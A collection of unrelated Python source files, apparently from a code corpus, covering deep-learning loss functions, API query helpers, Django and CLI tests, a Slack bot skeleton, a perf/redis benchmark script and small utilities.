super(PerceptualLoss, self).__init__()
self.norm_img = norm_img
self.use_pcp_loss = use_pcp_loss
self.use_style_loss = use_style_loss
self.layer_weights = layer_weights
self.vgg = VGGFeatureExtractor(
layer_name_list=list(layer_weights.keys()),
vgg_type=vgg_type,
use_input_norm=use_input_norm)
self.criterion_type = criterion
if self.criterion_type == 'l1':
self.criterion = torch.nn.L1Loss()
elif self.criterion_type == 'l2':
self.criterion = torch.nn.L2loss()
elif self.criterion_type == 'fro':
self.criterion = None
else:
raise NotImplementedError('%s criterion has not been supported.' % self.criterion_type)
def forward(self, x, gt):
"""Forward function.
Args:
x (Tensor): Input tensor with shape (n, c, h, w).
gt (Tensor): Ground-truth tensor with shape (n, c, h, w).
Returns:
Tensor: Forward results.
"""
if self.norm_img:
x = (x + 1.) * 0.5
gt = (gt + 1.) * 0.5
# extract vgg features
x_features = self.vgg(x)
gt_features = self.vgg(gt.detach())
# calculate perceptual loss
if self.use_pcp_loss:
percep_loss = 0
non_local_loss = None
for k in x_features.keys():
if self.criterion_type == 'fro':
percep_loss += torch.norm(
x_features[k] - gt_features[k],
p='fro') * self.layer_weights[k]
else:
percep_loss += self.criterion(x_features[k], gt_features[k]) * self.layer_weights[k]
# non_local_loss += self.non_local_criterion(x_features[k], gt_features[k]) * self.layer_weights[k] * 0.1
else:
percep_loss = None
# calculate style loss
if self.use_style_loss:
style_loss = 0
for k in x_features.keys():
if self.criterion_type == 'fro':
style_loss += torch.norm(
self._gram_mat(x_features[k]) -
self._gram_mat(gt_features[k]),
p='fro') * self.layer_weights[k]
else:
style_loss += self.criterion(self._gram_mat(x_features[k]), self._gram_mat(gt_features[k])) \
* self.layer_weights[k]
else:
style_loss = None
return percep_loss, style_loss,non_local_loss
def _gram_mat(self, x):
"""Calculate Gram matrix.
Args:
x (torch.Tensor): Tensor with shape of (n, c, h, w).
Returns:
torch.Tensor: Gram matrix.
"""
n, c, h, w = x.size()
features = x.view(n, c, w * h)
features_t = features.transpose(1, 2)
gram = features.bmm(features_t) / (c * h * w)
return gram
class AdversarialLoss(nn.Module):
def __init__(self, gan_type='vanilla', real_label_val=1.0, fake_label_val=0.0):
"""
Args:
gan_type (str): Support 'vanilla', 'lsgan', 'wgan', 'hinge'.
real_label_val (float): The value for real label. Default: 1.0.
fake_label_val (float): The value for fake label. Default: 0.0.
"""
super(AdversarialLoss, self).__init__()
self.gan_type = gan_type
self.real_label_val = real_label_val
self.fake_label_val = fake_label_val
if self.gan_type == 'vanilla':
self.loss = nn.BCEWithLogitsLoss()
elif self.gan_type == 'lsgan':
self.loss = nn.MSELoss()
elif self.gan_type == 'wgan':
self.loss = self._wgan_loss
elif self.gan_type == 'wgan_softplus':
self.loss = self._wgan_softplus_loss
elif self.gan_type == 'hinge':
self.loss = nn.ReLU()
else:
raise NotImplementedError('GAN type %s is not implemented.' % self.gan_type)
def _wgan_loss(self, input, target):
"""
Args:
input (Tensor): Input tensor.
target (bool): Target label.
"""
return -input.mean() if target else input.mean()
def _wgan_softplus_loss(self, input, target):
"""wgan loss with soft plus. softplus is a smooth approximation to the ReLU function.
In StyleGAN2, it is called:
Logistic loss for discriminator;
Non-saturating loss for generator.
Args:
input (Tensor): Input tensor.
target (bool): Target label.
"""
return F.softplus(-input).mean() if target else F.softplus(input).mean()
def get_target_label(self, input, target_is_real):
"""Get target label.
Args:
input (Tensor): Input tensor.
target_is_real (bool): Whether the target is real or fake.
Returns:
(bool | Tensor): Target tensor. Return bool for wgan, otherwise, return Tensor.
"""
if self.gan_type in ['wgan', 'wgan_softplus']:
return target_is_real
target_val = (self.real_label_val if target_is_real else self.fake_label_val)
return input.new_ones(input.size()) * target_val
def forward(self, input, target_is_real, is_disc=False):
"""
Args:
input (Tensor): The input for the loss module, i.e., the network
prediction.
target_is_real (bool): Whether the targe is real or fake.
is_disc (bool): Whether the loss for discriminators or not.
Default: False.
Returns:
Tensor: GAN loss value.
"""
target_label = self.get_target_label(input, target_is_real)
if self.gan_type == 'hinge':
if is_disc:
input = -input if target_is_real else input
loss = self.loss(1 + input).mean()
else:
loss = -input.mean()
else: # other gan types
loss = self.loss(input, target_label)
return loss
|
104118
|
import tensorflow as tf
import numpy as np
PROJ_EPS = 1e-5
EPS = 1e-15
MAX_TANH_ARG = 15.0
# Real x, not vector!
def tf_atanh(x):
return tf.atanh(tf.minimum(x, 1. - EPS)) # Only works for positive real x.
# Real x, not vector!
def tf_tanh(x):
return tf.tanh(tf.minimum(tf.maximum(x, -MAX_TANH_ARG), MAX_TANH_ARG))
def tf_dot(x, y):
return tf.reduce_sum(x * y, axis=1, keepdims=True)
def tf_norm(x):
return tf.norm(x, ord=2, axis=-1, keepdims=True)
|
104124
|
import time
import requests
from pysmashgg.exceptions import *
# Runs queries
def run_query(query, variables, header, auto_retry):
# This helper function is necessary for TooManyRequestsErrors
def _run_query(query, variables, header, auto_retry, seconds):
json_request = {'query': query, 'variables': variables}
try:
request = requests.post(url='https://api.smash.gg/gql/alpha', json=json_request, headers=header)
if request.status_code == 400:
raise RequestError
elif request.status_code == 429:
raise TooManyRequestsError
elif 400 <= request.status_code < 500:
raise ResponseError
elif 500 <= request.status_code < 600:
raise ServerError
elif 300 <= request.status_code < 400:
raise NoIdeaError
response = request.json()
return response
except RequestError:
print("Error 400: Bad request (probably means your key is wrong)")
return
except TooManyRequestsError:
if auto_retry:
print("Error 429: Sending too many requests right now, trying again in {} seconds".format(seconds))
time.sleep(seconds)
return _run_query(query, variables, header, auto_retry, seconds*2)
else:
print("Error 429: Sending too many requests right now")
return
except ResponseError:
print("Error {}: Unknown request error".format(request.status_code))
return
except ServerError:
print("Error {}: Unknown server error".format(request.status_code))
return
except NoIdeaError:
print("Error {}: I literally have no idea how you got this status code, please send this to me".format(request.status_code))
return
return _run_query(query, variables, header, auto_retry, 10)
|
104125
|
from ctypes import POINTER, c_char_p, byref
from ...ffi import utils
from ...ffi.ontology.facades import CTtsFacade
from ...ffi.utils import hermes_protocol_handler_tts_facade, hermes_drop_tts_facade
class TtsFFI(object):
def __init__(self, use_json_api=True):
self.use_json_api = use_json_api
self._facade = POINTER(CTtsFacade)()
def initialize_facade(self, protocol_handler):
hermes_protocol_handler_tts_facade(protocol_handler, byref(self._facade))
def release_facade(self):
hermes_drop_tts_facade(self._facade)
self._facade = POINTER(CTtsFacade)()
def _call_foreign_function(self, foreign_function_name, function_argument):
if self.use_json_api:
foreign_function_name = foreign_function_name + "_json"
a_json_string = str(function_argument) # function_argument should be a dict.
ptr_to_foreign_function_argument = c_char_p(a_json_string.encode('utf-8'))
else:
function_argument = function_argument.into_c_repr()
ptr_to_foreign_function_argument = byref(function_argument)
getattr(utils, foreign_function_name)(
self._facade,
ptr_to_foreign_function_argument
)
def publish_register_sound(self, message):
self._call_foreign_function(
'hermes_tts_publish_register_sound',
message
)
return self
|
104137
|
from click.testing import CliRunner
from modelindex.commands.cli import cli
def test_cli_invocation():
runner = CliRunner()
result = runner.invoke(cli)
assert result.exit_code == 0
def test_cli_check_ok():
runner = CliRunner()
result = runner.invoke(cli, ["check", "tests/test-mi/11_markdown/rexnet.md"])
assert result.exit_code == 0
assert "Checking" in result.output
assert "All good" in result.output
def test_cli_check_fail():
runner = CliRunner()
result = runner.invoke(cli, ["check", "tests/test-mi/01_base"])
assert result.exit_code == 0
assert "Path to README file docs/inception-v3-readme.md is not a valid file" in result.output
|
104139
|
import torch
import torch.nn as nn
from models.utils import parse_model_params, get_params_str
from models.utils import sample_gauss, nll_gauss
class RNN_GAUSS(nn.Module):
"""RNN with Gaussian output distribution."""
def __init__(self, params, parser=None):
super().__init__()
self.model_args = ['x_dim', 'y_dim', 'h_dim', 'rnn_dim', 'n_layers']
self.params = parse_model_params(self.model_args, params, parser)
self.params_str = get_params_str(self.model_args, params)
x_dim = params['x_dim']
y_dim = params['y_dim']
h_dim = params['h_dim']
rnn_dim = params['rnn_dim']
n_layers = params['n_layers']
self.dec = nn.Sequential(
nn.Linear(rnn_dim, h_dim),
nn.ReLU(),
nn.Linear(h_dim, h_dim),
nn.ReLU())
self.dec_mean = nn.Linear(h_dim, y_dim)
self.dec_std = nn.Sequential(
nn.Linear(h_dim, y_dim),
nn.Softplus())
self.rnn = nn.GRU(y_dim, rnn_dim, n_layers)
def forward(self, states, macro=None, hp=None):
out = {}
out['nll'] = 0
h = torch.zeros(self.params['n_layers'], states.size(1), self.params['rnn_dim'])
if self.params['cuda']:
h = h.cuda()
for t in range(states.size(0)):
y_t = states[t].clone()
dec_t = self.dec(torch.cat([h[-1]], 1))
dec_mean_t = self.dec_mean(dec_t)
dec_std_t = self.dec_std(dec_t)
_, h = self.rnn(y_t.unsqueeze(0), h)
out['nll'] += nll_gauss(dec_mean_t, dec_std_t, y_t)
return out
def sample(self, states, macro=None, burn_in=0):
h = torch.zeros(self.params['n_layers'], states.size(1), self.params['rnn_dim'])
for t in range(states.size(0)):
dec_t = self.dec(torch.cat([h[-1]], 1))
dec_mean_t = self.dec_mean(dec_t)
dec_std_t = self.dec_std(dec_t)
if t >= burn_in:
states[t] = sample_gauss(dec_mean_t, dec_std_t)
_, h = self.rnn(states[t].unsqueeze(0), h)
return states, None
|
104169
|
import numpy as np
from numpy.linalg import inv
class GeoArray(np.ndarray):
def __new__(cls, input_array, crs=4326, mat=None):
obj = np.asarray(input_array).view(cls)
obj.crs, obj.mat = crs, mat.reshape((2,3))
return obj
def __array_finalize__(self, obj):
if obj is None: return
self.crs = getattr(obj, 'crs', '')
self.mat = getattr(obj, 'mat', None)
def __getitem__(self, item):
sliced = True & isinstance(item, tuple)
if sliced:
sliced &= len(item) in (2, 3)
sliced &= isinstance(item[1], slice)
sliced &= isinstance(item[0], slice)
def gs(s): return (s.start or 0, s.step or 1)
if sliced:
(s1,d1), (s2,d2) = gs(item[0]), gs(item[1])
obj = super(GeoArray, self).__getitem__(item)
if not obj.mat is None:
m, offset = obj.mat[:,1:], obj.mat[:,:1]
o = np.dot(m, [[s2],[s1]]) + offset
t = m * [d2, d1]
obj.mat = np.hstack((o,t))
return obj
if not sliced:
return super().__getitem__(item).__array__()
def __array_wrap__(self, out_arr, context=None):
if out_arr.shape[:2] != self.shape[:2]:
out_arr = out_arr.__array__()
return out_arr
@property
def imat(self):
imat = np.vstack((self.mat[:,[1,2,0]], [[0,0,1]]))
return np.linalg.inv(imat)[:2,[2,0,1]]
@property
def imat1(self): return self.imat.ravel()[[1,2,4,5,0,3]]
def project(self, x, y):
x += 0.5; y += 0.5
m, offset = self.mat[:,1:], self.mat[:,:1]
xy = np.array([x, y]).reshape((2,-1))
return np.dot(m, xy) + offset
def invpro(self, e, n):
m, offset = self.mat[:,1:], self.mat[:,:1]
en = np.array([e, n]).reshape((2,-1))
return np.dot(inv(m), en - offset) - 0.5
def channels(self, n=None):
if n is None:
return 1 if self.ndim==2 else self.shape[2]
else:
return self if self.ndim==2 else self[:,:,n]
def lookup(self, lut):
return GeoArray(lut[self], self.crs, self.mat)
def getbox(self):
return (self.shape[:2], self.crs, self.mat)
def frombox(shp, crs, mat, chan=1, dtype=np.uint8):
if chan>1: shp += (chan,)
return GeoArray(np.zeros(shp, dtype=dtype), crs, mat)
def geoarray(arr, crs=None, mat=np.array([[1,1,0],[1,0,1]])):
return GeoArray(arr, crs, mat)
if __name__ == '__main__':
prj = np.array([0,1,0, 0,0,1])
a = GeoArray(np.ones((5,5)), crs=4326, mat=prj)
print(a.crs)
print(a.mat)
b = a+1
print(a.crs)
print(a.mat)
c = a[1::2,1::2]
print(c.crs)
print(c.mat)
|
104182
|
import struct
from suitcase.fields import BaseField
from suitcase.fields import BaseStructField
from suitcase.fields import BaseFixedByteSequence
class SLFloat32(BaseStructField):
"""Signed Little Endian 32-bit float field."""
PACK_FORMAT = UNPACK_FORMAT = b"<f"
def unpack(self, data, **kwargs):
self._value = struct.unpack(self.UNPACK_FORMAT, data)[0]
class UBInt32Sequence(BaseFixedByteSequence):
"""A sequence of unsigned, big-endian 32 bit integers.
:param length: Number of 32-bit integers in sequence.
:type length: Integer
"""
def __init__(self, length, **kwargs):
super().__init__(lambda l: ">" + "I" * l, length, **kwargs)
self.bytes_required = length * 4
class FixedLengthString(BaseField):
"""A string of a fixed number of bytes.
The specified number of bytes are read and then any null
bytes are stripped from the result.
:param length: Number of bytes to read.
:type length: Integer
"""
def __init__(self, length, **kwargs):
super().__init__(**kwargs)
self.length = length
@property
def bytes_required(self):
"""Number of bytes to read from stream."""
return self.length
def pack(self, stream):
stream.write(self._value.strip(b'\0'))
def unpack(self, data):
self._value = data.strip(b'\0')
|
104197
|
import numpy as np
from matplotlib import pyplot as plt
'''
Function for plotting training and validation curves.
'''
def learning_curves(history, multival=None, model_n=None, filepath=None, plot_from_epoch=0, plot_to_epoch=None):
n = len(history)
num_epochs = len(history[0]['loss'])
if plot_to_epoch is None:
plot_to_epoch = num_epochs
IoU_in_history = 'mIoU' in history[0].keys()
train_loss = np.zeros((n, num_epochs))
train_acc = np.zeros_like(train_loss)
val_loss = np.zeros_like(train_loss)
val_acc = np.zeros_like(train_loss)
if IoU_in_history:
train_mIoU = np.zeros_like(train_loss)
val_mIoU = np.zeros_like(train_loss)
# For the additional validation curves, which are at different scales
if multival is not None:
m = len(multival[0]['val_loss']) // num_epochs
val_loss_scales = np.zeros((n, num_epochs*m))
val_acc_scales = np.zeros_like(val_loss_scales)
for i in range(len(history)):
train_loss[i, :] = history[i]['loss']
train_acc[i, :] = history[i]['acc']
val_loss[i, :] = history[i]['val_loss']
val_acc[i, :] = history[i]['val_acc']
if IoU_in_history:
train_mIoU[i, :] = history[i]['mIoU']
val_mIoU[i, :] = history[i]['val_mIoU']
if multival is not None:
val_loss_scales[i, :] = multival[i]['val_loss']
val_acc_scales[i, :] = multival[i]['val_acc']
# Extracting mean values and standard deviations
mean_train_loss = np.mean(train_loss, 0)
std_train_loss = np.std(train_loss, 0, ddof=1)
mean_train_acc = np.mean(train_acc, 0)
std_train_acc = np.std(train_acc, 0, ddof=1)
mean_val_loss = np.mean(val_loss, 0)
std_val_loss = np.std(val_loss, 0, ddof=1)
mean_val_acc = np.mean(val_acc, 0)
std_val_acc = np.std(val_acc, 0, ddof=1)
if IoU_in_history:
mean_train_mIoU = np.mean(train_mIoU, 0)
std_train_mIoU = np.std(train_mIoU, 0, ddof=1)
mean_val_mIoU = np.mean(val_mIoU, 0)
std_val_mIoU = np.std(val_mIoU, 0, ddof=1)
# Third dimension corresponds to scales
if multival is not None:
val_loss_scales = np.reshape(val_loss_scales, [n, num_epochs, m])
val_acc_scales = np.reshape(val_acc_scales, [n, num_epochs, m])
mean_val_loss_scales, mean_val_acc_scales = np.mean(val_loss_scales, axis=0), np.mean(val_acc_scales, axis=0)
std_val_loss_scales, std_val_acc_scales = np.std(val_loss_scales, axis=0, ddof=1), np.std(val_acc_scales, axis=0, ddof=1)
# if n == 0:
# std_train_loss = 0
# std_train_acc = 0
# std_val_loss = 0
# std_val_acc = 0
# std_val_loss_scales = 0
# std_val_acc_scales = 0
# else:
# std_train_loss = np.std(train_loss, 0, ddof=1)
# std_train_acc = np.std(train_acc, 0, ddof=1)
# std_val_loss = np.std(val_loss, 0, ddof=1)
# std_val_acc = np.std(val_acc, 0, ddof=1)
# std_val_loss_scales = np.std(val_loss_scales, axis=0, ddof=1)
# std_val_acc_scales = np.std(val_acc_scales, axis=0, ddof=1)
if filepath is not None:
plt.ioff()
# Plotting mean Loss curves with stds
plt.figure(figsize=(10, 10))
plt.title(model_n + '_loss')
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_train_loss[plot_from_epoch:plot_to_epoch], color="g", label='training')
plt.fill_between(np.arange(plot_to_epoch - plot_from_epoch), mean_train_loss[plot_from_epoch:plot_to_epoch] - std_train_loss[plot_from_epoch:plot_to_epoch],
mean_train_loss[plot_from_epoch:plot_to_epoch] + std_train_loss[plot_from_epoch:plot_to_epoch], alpha=0.2, color="g")
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_loss[plot_from_epoch:plot_to_epoch], color='r', label='validation')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), mean_val_loss[plot_from_epoch:plot_to_epoch] - std_val_loss[plot_from_epoch:plot_to_epoch],
mean_val_loss[plot_from_epoch:plot_to_epoch] + std_val_loss[plot_from_epoch:plot_to_epoch], alpha=0.2, color='r')
if multival is not None:
for i in range(m):
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_loss_scales[plot_from_epoch:plot_to_epoch, i], label=f'validation_{i+1}')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), mean_val_loss_scales[plot_from_epoch:plot_to_epoch, i] - std_val_loss_scales[plot_from_epoch:plot_to_epoch, i],
mean_val_loss_scales[plot_from_epoch:plot_to_epoch, i] + std_val_loss_scales[plot_from_epoch:plot_to_epoch, i], alpha=0.2, )
plt.xlabel("Epoch number")
plt.ylabel("Loss")
plt.legend()
if filepath is not None:
plt.savefig(filepath + model_n + '_loss' + '.png')
# Plotting mean Accuracy curves with stds
plt.figure(figsize=(10, 10))
plt.title(model_n + '_acc')
plt.ylim(0, 1.05)
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_train_acc[plot_from_epoch:plot_to_epoch], color="g", label='training')
plt.fill_between(np.arange(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_train_acc[plot_from_epoch:plot_to_epoch] - std_train_acc[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_train_acc[plot_from_epoch:plot_to_epoch] + std_train_acc[plot_from_epoch:plot_to_epoch]), alpha=0.2, color="g")
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_acc[plot_from_epoch:plot_to_epoch], color='r', label='validation')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_val_acc[plot_from_epoch:plot_to_epoch] - std_val_acc[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_val_acc[plot_from_epoch:plot_to_epoch] + std_val_acc[plot_from_epoch:plot_to_epoch]), alpha=0.2, color='r')
if multival is not None:
for i in range(m):
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_acc_scales[plot_from_epoch:plot_to_epoch, i], label=f'validation_{i+1}')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_val_acc_scales[plot_from_epoch:plot_to_epoch, i] - std_val_acc_scales[plot_from_epoch:plot_to_epoch, i]),
np.minimum(1, mean_val_acc_scales[plot_from_epoch:plot_to_epoch, i] + std_val_acc_scales[plot_from_epoch:plot_to_epoch, i]), alpha=0.2)
plt.xlabel("Epoch number")
plt.ylabel("Accuracy")
plt.legend()
if filepath is not None:
plt.savefig(filepath + model_n + '_acc' + '.png')
if IoU_in_history:
plt.figure(figsize=(10, 10))
plt.title(model_n + '_mIoU')
plt.ylim(0, 1.05)
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_train_mIoU[plot_from_epoch:plot_to_epoch], color="g",
label='training')
plt.fill_between(np.arange(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_train_mIoU[plot_from_epoch:plot_to_epoch] - std_train_mIoU[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_train_mIoU[plot_from_epoch:plot_to_epoch] + std_train_mIoU[plot_from_epoch:plot_to_epoch]),
alpha=0.2, color="g")
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_mIoU[plot_from_epoch:plot_to_epoch], color='r',
label='validation')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_val_mIoU[plot_from_epoch:plot_to_epoch] - std_val_mIoU[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_val_mIoU[plot_from_epoch:plot_to_epoch] + std_val_mIoU[plot_from_epoch:plot_to_epoch]),
alpha=0.2, color='r')
plt.xlabel("Epoch number")
plt.ylabel("mIoU")
plt.legend()
if filepath is not None:
if IoU_in_history:
plt.savefig(filepath + model_n + '_mIoU' + '.png')
else:
plt.show()
plt.close('all')
return mean_train_loss, std_train_loss, mean_train_acc, std_train_acc, mean_val_loss, std_val_loss, mean_val_acc, std_val_acc
|
104223
|
from kaishi.image.util import validate_image_header
def test_validate_image_header():
invalid_file = "tests/data/image/empty_unsupported_extension.gif"
valid_file = "tests/data/image/sample.jpg"
assert validate_image_header(invalid_file) is False
assert validate_image_header(valid_file) is True
|
104232
|
import pytest
import schedule
from orchestrator.cli.scheduler import run
from orchestrator.schedules import ALL_SCHEDULERS
from orchestrator.schedules.scheduling import scheduler
def test_scheduling_with_period(capsys, monkeypatch):
ref = {"called": False}
@scheduler(name="test", time_unit="second", period=1)
def test_scheduler():
ref["called"] = True
print("I've run") # noqa: T001
return schedule.CancelJob
ALL_SCHEDULERS.clear()
ALL_SCHEDULERS.append(test_scheduler)
# Avoid having to mock next_run() and idle_seconds() deep in the scheduler as we are only interested in the job:
with pytest.raises(TypeError):
run()
captured = capsys.readouterr()
assert captured.out == "I've run\n"
assert ref["called"]
|
104261
|
from src.utilities.app_context import LOG_WITHOUT_CONTEXT
from anuvaad_auditor.loghandler import log_info, log_exception
import csv
import uuid
class ParseCSV (object):
def __init__(self):
pass
def get_parallel_sentences(filename, source_language, target_language, skip_header=True):
parallel_sentences = []
log_info("parsing parallel sentence from file %s" % (filename), LOG_WITHOUT_CONTEXT)
with open(filename) as csv_file:
reader = csv.reader(csv_file, delimiter=',')
rows = []
for row in reader:
rows.append(row)
if skip_header == True:
rows = rows[1:]
if len(rows)==0:
log_info("no sentences found on %s" % (filename), LOG_WITHOUT_CONTEXT)
return []
for row in rows:
source_sentence = {}
target_sentence = {}
source_sentence['language'] = source_language
source_sentence['id'] = str(uuid.uuid4())
source_sentence['text'] = row[0]
target_sentence['language'] = target_language
target_sentence['id'] = str(uuid.uuid4())
target_sentence['text'] = row[1]
parallel_sentences.append({
'annotationId': str(uuid.uuid4()),
'source': source_sentence,
'target': target_sentence
})
return parallel_sentences
|
104275
|
def variable_argument( var1, *vari):
print "Out-put is",var1
for var in vari:
print var
variable_argument(60)
variable_argument(100,90,40,50,60)
|
104310
|
import os, time
from slackclient import SlackClient
from pyslack import SlackClient as slackclient
client = slackclient(os.environ.get('SLACK_BOT_TOKEN'))
BOT_NAME = 'aws_bot'
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# starterbot's ID as an environment variable
# BOT_ID = os.environ.get("BOT_ID")
def chk_cmd(cmd):
'''
if command is not in the dictionary of known commands then post msg indicating unknown cmd
:param cmd:
:return:
'''
if 'hi' in cmd: return "Hi"
else: return "That command was not found"
# if True: return command + " Found"
def handle_command(command, channel):
"""
Receives commands directed at the bot and determines if they
are valid commands. If so, then acts on the commands. If not,
returns back what it needs for clarification.
"""
response = chk_cmd(command)
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
response = "Not sure what you mean. Use the *" + EXAMPLE_COMMAND + \
"* command with numbers, delimited by spaces."
if command.startswith(EXAMPLE_COMMAND):
response = "Sure...write some more code then I can do that!"
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
elif command.startswith('help') or command.startswith('\h'):
response = '@aws_bot <command> <arguments_or_options>' + "\n" \
'\h, help provides this help screen' + "\n" \
'do executes an aws commandlet' + "\n"
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
# aws functions to perform specific functions
def checkKeyAge():
pass
def checkPassAge():
pass
def checkLastLogin():
pass
def createInstance():
pass
def listInstances(keypair):
pass
def shutdownInstances(keypair):
pass
def createCluster(clusterName):
'''
receieves an expected name and orchestrates the creation / startup of a cluster
:param clusterName:
:return:
'''
pass
def checkMyAccount():
'''
:output: prints the status of the account scecurity
:return: none
'''
checkKeyAge();
checkPassAge();
checkLastLogin();
def deploySomeInstances():
pass
def parse_slack_output(slack_rtm_output):
"""
The Slack Real Time Messaging API is an events firehose.
this parsing function returns None unless a message is
directed at the Bot, based on its ID.
"""
output_list = slack_rtm_output
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
# return text after the @ mention, whitespace removed
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
if __name__ == "__main__":
# constants
BOT_ID=''
api_call = slack_client.api_call("users.list")
if api_call.get('ok'):
# retrieve all users so we can find our bot
users = api_call.get('members')
for user in users:
if 'name' in user and user.get('name') == BOT_NAME:
client.chat_post_message('#General', user['name'] + " python is working", username=user['name'])
print("Bot ID for '" + user['name'] + "' is " + user.get('id'))
BOT_ID = user.get('id')
AT_BOT = "<@" + BOT_ID + ">"
EXAMPLE_COMMAND = "do"
else:
print("could not find bot user with the name " + BOT_NAME)
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
|
104414
|
from __future__ import absolute_import, division, print_function
import subprocess
import os
import sys
import pandas
import socket
from time import sleep
from typing import IO, Any, Optional
perf_cmd = [
"perf",
"record",
"--no-buildid",
"--no-buildid-cache",
"-e",
"raw_syscalls:*",
"--switch-output",
"--overwrite",
"-a",
"--tail-synthesize",
]
server_cmd = ["redis-server", "--port"]
def check_port_inuse(port):
# type: (int) -> bool
s = socket.socket()
try:
s.connect(("127.0.0.1", port))
s.close()
return True
except socket.error:
return False
def bench_redis(repeat=3, n=1000000):
# type: (int, int) -> pandas.DataFrame
def read_result(name, file):
# type: (str, Optional[IO[Any]]) -> pandas.DataFrame
df = pandas.read_csv(file, names=["Type", "Req/s"])
df["Name"] = name
return df
bench_cmd = [
"redis-benchmark",
"-r",
"100000",
"-t",
"set,lpush",
"-n",
str(n),
"--csv",
"-p",
]
init_port = 10000
results = []
with open(os.devnull, "w") as fnull:
for i in range(repeat):
print("\nRunning the {}th benchmark\n".format(i + 1))
print("Record performance with perf")
while check_port_inuse(init_port):
init_port += 1
serv = subprocess.Popen(
perf_cmd + server_cmd + [str(init_port)], stdout=fnull
)
sleep(1) # for setup
bench = subprocess.Popen(
bench_cmd + [str(init_port)], stdout=subprocess.PIPE
)
bench.wait()
serv.terminate()
results.append(read_result("perf", bench.stdout))
print("Record performance without perf")
while check_port_inuse(init_port):
init_port += 1
serv = subprocess.Popen(server_cmd + [str(init_port)], stdout=fnull)
sleep(1) # for setup
bench = subprocess.Popen(
bench_cmd + [str(init_port)], stdout=subprocess.PIPE
)
bench.wait()
serv.terminate()
results.append(read_result("no-perf", bench.stdout))
df = pandas.concat(results)
path = os.path.join(os.path.dirname(__file__), "results", "syscall.tsv")
print("wrote %s" % path)
df.to_csv(path, sep="\t")
if __name__ == "__main__":
if os.geteuid() != 0:
print("needs root for perf", file=sys.stderr)
sys.exit(1)
bench_redis(10)
|
104428
|
from rest_framework import serializers
from .models import Task
class TaskSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Task
read_only_fields = ('slug',)
|
104430
|
from django.test import TestCase
from django.urls import reverse
from django.utils import timezone
from core.models import Category, Post
from users.models import UserProfile
from django.contrib.auth.models import User
import pytest
@pytest.mark.django_db
class CategoryTest(TestCase):
def create_category(self, title="test"):
return Category.objects.create(title=title)
def test_category_creation(self):
c = self.create_category()
self.assertTrue(isinstance(c, Category))
self.assertEqual(c.__str__(), c.title)
@pytest.mark.django_db
class PostTest(TestCase):
def setUp(self):
self.category = Category.objects.create(title='testcat', slug='testcat',)
self.user = User.objects.create_user(username="name", email="<EMAIL>", password="<PASSWORD>")
self.userprofile = UserProfile.objects.create(user=self.user, bio="great guy")
def create_post(self, title="product"):
return Post.objects.create(id=12, category=self.category, title=title, author=self.userprofile, created_date=timezone.now())
def test_post_creation(self):
p = self.create_post()
self.assertTrue(isinstance(p, Post))
self.assertEqual(p.__str__(), p.title)
@pytest.mark.django_db
class UserProfileTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(username="name", email="<EMAIL>", password="<PASSWORD>")
def create_userprofile(self):
return UserProfile.objects.create(user=self.user, bio="great guy")
def test_userprofile_create(self):
u = self.create_userprofile()
self.assertTrue(isinstance(u, UserProfile))
|
104529
|
from .vcoco_evaluation import VCOCOEvaluator
from .hico_evaluation import HICOEvaluator
from detectron2.evaluation.evaluator import DatasetEvaluator, DatasetEvaluators, inference_on_dataset
from detectron2.evaluation.testing import print_csv_format, verify_results
__all__ = [k for k in globals().keys() if not k.startswith("_")]
|
104533
|
import socket
from contextlib import closing
from typing import cast
from .logging import LoggingDescriptor
_logger = LoggingDescriptor(name=__name__)
def find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("127.0.0.1", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return cast(int, s.getsockname()[1])
def check_free_port(port: int) -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(("127.0.0.1", port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return cast(int, s.getsockname()[1])
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
_logger.warning(f"Port {port} is not free. Try to find a free port.")
return find_free_port()
|
104563
|
import os
import glob
import random
class PairGenerator(object):
person1 = 'person1'
person2 = 'person2'
label = 'same_person'
def __init__(self, lfw_path='./tf_dataset/resources' + os.path.sep + 'lfw'):
self.all_people = self.generate_all_people_dict(lfw_path)
def generate_all_people_dict(self, lfw_path):
# generates a dictionary between a person and all the photos of that person
all_people = {}
for person_folder in os.listdir(lfw_path):
person_photos = glob.glob(lfw_path + os.path.sep + person_folder + os.path.sep + '*.jpg')
all_people[person_folder] = person_photos
return all_people
def get_next_pair(self):
